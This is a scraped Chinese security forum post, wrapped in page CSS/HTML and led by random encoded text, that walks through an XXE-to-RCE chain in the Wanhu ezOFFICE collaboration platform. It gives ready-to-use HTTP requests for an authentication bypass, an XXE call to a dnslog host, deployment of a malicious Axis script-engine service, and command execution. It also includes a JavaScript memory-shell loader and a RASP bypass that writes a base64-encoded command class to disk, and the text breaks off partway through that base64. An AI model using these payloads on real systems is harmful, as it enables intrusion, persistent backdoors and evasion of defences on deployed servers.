D87n3aV2u3LVvWYkl2HCu2ZUl2nNjPibM6GyGrQxKFhCRAEkKAsIYIaIeUJYQBSsO0YEjLsJXSQqa0LBVbof0oy7TTUjpQt512Ol9ppzt0Gr3859z7nvTkWCTM9yfWffu9525nv+cKegH+iYdEk+AQ4kKn0C/MEwQS8PcMkWxvMhF1EoM3YDSk6BBJJnrhZk/A74Wb0RnUaPD6e3KEXaZI5RE/J72/sDRYXu/rm3V04HXz7Yeal/STphs7g8HXl7++fHT09ablzWOdh8yeBgu5zmw+7mg1249bGrdZLMftMYv9uDlI7v6F2fz6wNFZfX2vWxo/uLGJ9C9pPtTZvLzp9dFRyOP1pqYNnYcsDR4zNUFJx+3mVshhm6XR8hQ7NQuiIJwsioIoCXVCm9AF9Yr0ZDOu3kQsEjX4XF5/Wu9zkGgimYmlSNI1SHKREAm4HMTYQXxQt2yGjBPB4XY75CKmRCDZlVkitWcJybarx4LkbnITAR6zl2TJ4ZbG27PZ9nF8qchfkvHlcXwOza0DuP4uviYuFDxChzAozAfIEoMkRAzGEBkkmTRAkCIz4EbAn81lE8mEwYiPAwhmwuDh3ZGAR/5AiBgdcDNpNIRIjhJdU2aaranRNTCUlOjYyMgYvdb5qU2bjtR7l69e++XcrFuuW0gkeu7SpfvOeSM02k+Cb2R7t2z95dpV7vmLf3qswfeK3RKzk2JwmjWY6TA2Bdw9EcgDcgptutIo7tpwzv3t8a6l7ea5VyxaeqFRPyZ/840g6R8NvbH7p4vnu1et/eXWLb1jvoZvYx8KRqjnSXGvOCJYBL8wJGwQzhMuFq6G2mZ6E9gDaRhlUWMmzS6bSbonRI0iVD4C9RQTgzQdywxSfyAb4IcQbcbadmCXxTKJGSQWNbSQCLRQBzEajL4kz8Y/QJJqjrGegAhtlIaOHyI0Dz0V9LrO87qwz/b64kGLbpaxt1XOt/YaZ+kswbivjqQWzbRGouzgn9
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment{color:green}.hljs-built_in,.hljs-keyword,.hljs-name,.hljs-tag{color:#00f}.hljs-literal,.hljs-string,.hljs-title{color:#a31515}.hljs-attr{color:red}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body strong{font-weight:600}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h2,.markdown-body h3{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h3{font-weight:600;font-size:1.25em}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
<script src="/static/js/html5shiv.min.js"></script>
<script src="/static/js/respond.min.js"></script>
<![endif]-->
<style>.hot{z-index:10}</style>
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
<body>
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-9 col-md-9 col-lg-9">
<div class=navbar-header>
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
</button>
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
</div>
<div class="collapse navbar-collapse" id=global-navbar>
<ul class="nav navbar-nav">
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
<li><a href=https://forum.butian.net/questions>问答</a></li>
<li><a href=https://forum.butian.net/shop>商城</a></li>
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
<li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
<span class=hot>NEW</span>
</li>
<li><a href=https://forum.butian.net/movable>活动</a></li>
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
</li>
</ul>
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
<input type=text name=word id=searchBox class=form-control placeholder value>
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">万户ezOFFICE协同管理平台 GeneralWeb XXE to RCE</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/47>渗透测试</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
之前实战遇到了但是网上的poc懂得都懂索性就专门研究一下漏洞成因利用以及内存马方面
</div>
<textarea id=md_view_content style=display:none value="![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-679b14fb254b2fb83cbe48b2e963318e78236e95.png)
之前实战遇到了但是网上的poc懂得都懂索性就专门研究一下
JDK版本1.6.0
操作系统Windows Server 2012
漏洞分析
----
从web.xml看起
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4bbb04580b8ae906e93dab8eefa4cc44dd21a238.png)
使用了 XFire 与 Axis 两种 WebService 框架
看到 XFire 配置文件`D:/jboss/jboss-as/server/oa/deploy/defaultroot.war/WEB-INF/classes/META-INF/xfire/services.xml`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-d33e85de27468a143fce1fdf4de45d91fb21d709.png)
配置了一个GeneralWeb的服务找到该类`com.whir.service.webservice.GeneralWeb`
```java
package com.whir.service.webservice;
import com.whir.service.common.CallApi;
public class GeneralWeb {
public String OAManager(String input) throws Exception {
CallApi callapi = new CallApi();
return callapi.getResult(input);
}
}
```
`com.whir.service.common.CallApi#getResult`
```java
public String getResult(String input) throws Exception {
if (serviceMap == null) {
throw new Exception(&quot;Error: serviceMap can not is null&quot;);
}
SAXBuilder builder = new SAXBuilder();
byte[] b = input.getBytes(&quot;utf-8&quot;);
InputStream is = new ByteArrayInputStream(b);
Document doc = builder.build(is);
Element root = doc.getRootElement();
```
使用SAXBuilder进行解析并且未进行过滤产生XXE漏洞
鉴权方面代码在`com.whir.common.util.SetCharacterEncodingFilter`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-889c69a7c94a8f970c2f358344bf3ac33530d91d.png)
使用的是 getRequestURI那么就有很多绕过方法了简单列举几个
```php
/iWebOfficeSign/OfficeServer.jsp/../../
/xfservices/./GeneralWeb
.jsp;.js
```
漏洞利用
----
触发dnslog
```php
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 457
<soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:gen=&quot;http://com.whir.service/GeneralWeb&quot;>
<soapenv:Body>
<gen:OAManager>
<gen:input>
&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY x SYSTEM &quot;http://123.6x9ryk.dnslog.cn&quot;&amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;x;&amp;lt;/root&amp;gt;
</gen:input>
</gen:OAManager>
</soapenv:Body>
</soapenv:Envelope>
```
因为使用了Axis我们可以通过AdminServlet创建任意服务看到server-config.wsdd
```xml
<service name=&quot;AdminService&quot; provider=&quot;java:MSG&quot;>
<parameter name=&quot;allowedMethods&quot; value=&quot;AdminService&quot;/>
<parameter name=&quot;enableRemoteAdmin&quot; value=&quot;false&quot;/>
<parameter name=&quot;className&quot; value=&quot;org.apache.axis.utils.Admin&quot;/>
<namespace>http://xml.apache.org/axis/wsdd/</namespace>
</service>
```
那么思路就很清晰了通过xxe的get请求部署恶意服务由于JDK是低版本那么可以部署RhinoScriptEngineService
```xml
http://127.0.0.1:{{Port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-933bab13bb758e5a40d3c7a1bdcffcb882bba84b.png)
部署成功
```php
POST /defaultroot/services/./RhinoScriptEngineService HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 973
<soapenv:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:jav=&quot;http://javascript.script.sun.com&quot;>
<soapenv:Body>
<eval xmlns=&quot;http://127.0.0.1:8080/services/scriptEngine&quot;>
<arg0 xmlns=&quot;&quot;>
<![CDATA[
try {
load(&quot;nashorn:Moziilla_compat.js&quot;);
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
var command = &quot;cmd /c whoami&quot;;
var pb = new java.lang.ProcessBuilder(Arrays.asList(command.split(&quot; &quot;)));
var process = pb.start();
var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();
ret;
]]>
</arg0>
<arg1 xmlns=&quot;&quot; xsi:type=&quot;urn:SimpleScriptContext&quot; xmlns:urn=&quot;urn:beanservice&quot;>
</arg1>
</eval>
</soapenv:Body>
</soapenv:Envelope>
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-30d99a7f51736e83f9db2a190628914f5a45c840.png)
成功执行命令
### 内存马
Java-Js-Engine-Payloads<https://github.com/yzddmr6/Java-Js-Engine-Payloads>
适配了JDK6-14的内存马
```java
try {
load(&quot;nashorn:mozilla_compat.js&quot;);
} catch (e) {
}
function getUnsafe() {
var theUnsafeMethod =
java.lang.Class.forName(&quot;sun.misc.Unsafe&quot;).getDeclaredField(&quot;theUnsafe&quot;);
theUnsafeMethod.setAccessible(true);
return theUnsafeMethod.get(null);
}
function removeClassCache(clazz) {
var unsafe = getUnsafe();
var clazzAnonymousClass = unsafe.defineAnonymousClass(
clazz,
java.lang.Class.forName(&quot;java.lang.Class&quot;)
.getResourceAsStream(&quot;Class.class&quot;)
.readAllBytes(),
null
);
var reflectionDataField =
clazzAnonymousClass.getDeclaredField(&quot;reflectionData&quot;);
unsafe.putObject(clazz, unsafe.objectFieldOffset(reflectionDataField), null);
}
function bypassReflectionFilter() {
var reflectionClass;
try {
reflectionClass = java.lang.Class.forName(
&quot;jdk.internal.reflect.Reflection&quot;
);
} catch (error) {
reflectionClass = java.lang.Class.forName(&quot;sun.reflect.Reflection&quot;);
}
var unsafe = getUnsafe();
var classBuffer = reflectionClass
.getResourceAsStream(&quot;Reflection.class&quot;)
.readAllBytes();
var reflectionAnonymousClass = unsafe.defineAnonymousClass(
reflectionClass,
classBuffer,
null
);
var fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField(&quot;fieldFilterMap&quot;);
var methodFilterMapField =
reflectionAnonymousClass.getDeclaredField(&quot;methodFilterMap&quot;);
if (
fieldFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(&quot;java.util.HashMap&quot;))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(fieldFilterMapField),
java.lang.Class.forName(&quot;java.util.HashMap&quot;)
.getConstructor()
.newInstance()
);
}
if (
methodFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(&quot;java.util.HashMap&quot;))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(methodFilterMapField),
java.lang.Class.forName(&quot;java.util.HashMap&quot;)
.getConstructor()
.newInstance()
);
}
removeClassCache(java.lang.Class.forName(&quot;java.lang.Class&quot;));
}
function setAccessible(accessibleObject) {
var unsafe = getUnsafe();
var overrideField = java.lang.Class.forName(
&quot;java.lang.reflect.AccessibleObject&quot;
).getDeclaredField(&quot;override&quot;);
var offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, true);
}
function defineClass(bytes) {
var clz = null;
var version = java.lang.System.getProperty(&quot;java.version&quot;);
var unsafe = getUnsafe();
var classLoader = new java.net.URLClassLoader(
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(&quot;java.net.URL&quot;),
0
)
);
try {
if (version.split(&quot;.&quot;)[0] &amp;gt;= 11) {
bypassReflectionFilter();
defineClassMethod = java.lang.Class.forName(
&quot;java.lang.ClassLoader&quot;
).getDeclaredMethod(
&quot;defineClass&quot;,
java.lang.Class.forName(&quot;[B&quot;),
java.lang.Integer.TYPE,
java.lang.Integer.TYPE
);
setAccessible(defineClassMethod);
clz = defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
} else {
var protectionDomain = new java.security.ProtectionDomain(
new java.security.CodeSource(
null,
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(&quot;java.security.cert.Certificate&quot;),
0
)
),
null,
classLoader,
[]
);
clz = unsafe.defineClass(
null,
bytes,
0,
bytes.length,
classLoader,
protectionDomain
);
}
} catch (error) {
error.printStackTrace();
} finally {
return clz;
}
}
function base64DecodeToByte(str) {
var bt;
try {
bt = java.lang.Class.forName(&quot;sun.misc.BASE64Decoder&quot;).newInstance().decodeBuffer(str);
} catch (e) {
bt = java.lang.Class.forName(&quot;java.util.Base64&quot;).newInstance().getDecoder().decode(str);
}
return bt;
}
clz = defineClass(base64DecodeToByte(code));
clz.newInstance();
```
由于JBoss 低版本套的是 tomcat所以直接使用 tomcat 内存马即可
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-87ab87fce34e7e41b93767a4a479fcbcd37b3f8a.png)
使用Listener组件容错高
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-c1ea2c55639e04a5643b94defd04fd15cadbae59.png)
执行,无报错并且返回 200说明成功了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-24153a68c8d45034111bcc9bd3656df5280b0148.png)
随便找个路径连接即可
### RASP绕过
在命令执行的时候可能会遇到:**java.lang.SecurityException: cmd execute denied !!!**
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4c237161525299a4b84664bcfc5e228953a77419.png)
即存在RASP而RASP一般是通过黑名单进行过滤的
这里禁用了ProcessBuilder我们尝试更底层的命令执行ProcessImpl该类是private所以只能反射调用
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-350f2ffdee079101528ae6f4106f34e2e2e5792b.png)
这里JDK1.6和JDK1.8的构造方法存在差异,所以需要小小修改一下
当调用setAccessible的时候会报错
```php
sun.org.mozilla.javascript.internal.EcmaError: TypeError: Cannot call method &quot;setAccessible&quot; of null
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-72f5ac149880b8a2ce93a7b044c47067ab32102c.png)
在js中无法反射调用根据网上的文章我们可以写class文件然后URLClassLoader去加载
```java
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Map;
public class Testcmd {
String result = &quot;&quot;;
public Testcmd(String paramString) throws Exception{
boolean isLinux = true;
String osTyp = System.getProperty(&quot;os.name&quot;);
if (osTyp != null &amp;amp;&amp;amp; osTyp.toLowerCase().contains(&quot;win&quot;)) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{&quot;bash&quot;, &quot;-c&quot;, paramString} : new String[]{&quot;cmd.exe&quot;, &quot;/c&quot;, paramString};
Class clazz = Class.forName(&quot;java.lang.ProcessImpl&quot;);
Method method = clazz.getDeclaredMethod(&quot;start&quot;, String[].class, Map.class,String.class,boolean.class);
method.setAccessible(true);
InputStream ins = ((Process) method.invoke(null,cmds,null,null,true)).getInputStream();
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] bytes = new byte[1024];
int size;
while((size = ins.read(bytes)) &amp;gt; 0)
bos.write(bytes,0,size);
ins.close();
this.result = bos.toString();
}
public java.lang.String toString() {
return this.result;
}
public static void main(String[] args) {
}
}
```
没有ban掉File类可以将class文件写入到系统中
```java
try {
load(&quot;nashorn:Moziilla_compat.js&quot;);
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.sun.misc);
var file = new File(&quot;../server/Testcmd.class&quot;);
var fos = new FileOutputStream(file);
var base64Decoder = new BASE64Decoder();
var decodeContent = base64Decoder.decodeBuffer(&quot;yv66vgAAADIAkAoAFwBPCABQCQAiAFEIAFIKAFMAVAoACQBVCABWCgAJAFcHAFgIAFkIAFoIAFsIAFwIAF0KABEAXggAXwcAYAcAMQcAYQkAYgBjCgARAGQKAGUAZgcAZwoAYgBoCgBlAGkHAGoKABoAawcAbAoAHABPCgBtAG4KABwAbwoAbQBwCgAcAHEHAHIBAAZyZXN1bHQBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACUxUZXN0Y21kOwEAC3BhcmFtU3RyaW5nAQAHaXNMaW51eAEAAVoBAAVvc1R5cAEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAFY2xhenoBABFMamF2YS9sYW5nL0NsYXNzOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQADaW5zAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQADYm9zAQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEABWJ5dGVzAQACW0IBAARzaXplAQABSQEADVN0YWNrTWFwVGFibGUHAHIHAFgHAGAHAHMHAHQHAGwHADsBAApFeGNlcHRpb25zBwB1AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAClNvdXJjZUZpbGUBACFUZXN0Y21kLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMACUAdgEAAAwAIwAkAQAHb3MubmFtZQcAdwwAeAB5DAB6AEkBAAN3aW4MAHsAfAEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBAAdjbWQuZXhlAQACL2MBABVqYXZhLmxhbmcuUHJvY2Vzc0ltcGwMAH0AfgEABXN0YXJ0AQAPamF2YS9sYW5nL0NsYXNzAQANamF2YS91dGlsL01hcAcAfwwAgAAzDACBAIIHAHMMAIMAhAEAEGphdmEvbGFuZy9PYmplY3QMAIUAhgwAhwCIAQARamF2YS9sYW5nL1Byb2Nlc3MMAIkAigEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwB0DACLAIwMAI0AjgwAjwB2DABIAEkBAAdUZXN0Y21kAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YS9pby9JbnB1dFN0cmVhbQEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAMoKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEWphdmEvbGFuZy9Cb29sZWFuAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihaKUxqYXZhL2xhbmcvQm9vbGVhbjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQAFY2xvc2UAIQAiABcAAAABAAAAIwAkAAAAAwABACUAJgACACcAAAH5AAYACwAAAOIqtwABKhICtQADBD0SBLgABU4txgARLbYABhIHtgAImQAFAz0cmQAYBr0ACVkDEgpTWQQSC1NZBStTpwAVBr0ACVkDEgxTWQQSDVNZBStTOgQSDrgADzoFGQUSEAe9ABFZAxMAElNZBBMAE1NZBRMACVNZBrIAFFO2ABU6BhkGBLYAFhkGAQe9ABdZAxkEU1kEAVNZBQFTWQYEuAAYU7YAGcAAGrYAGzoHuwAcWbcAHToIEQQAvAg6CRkHGQm2AB5ZNgqeABAZCBkJAxUKtgAfp//pGQe2ACAqGQi2ACG1AAOxAAAAAwAoAAAASgASAAAACAAEAAcACgAJAAwACgASAAsAIgAMACQADgBRABAAWAARAH0AEgCDABMAqQAUAL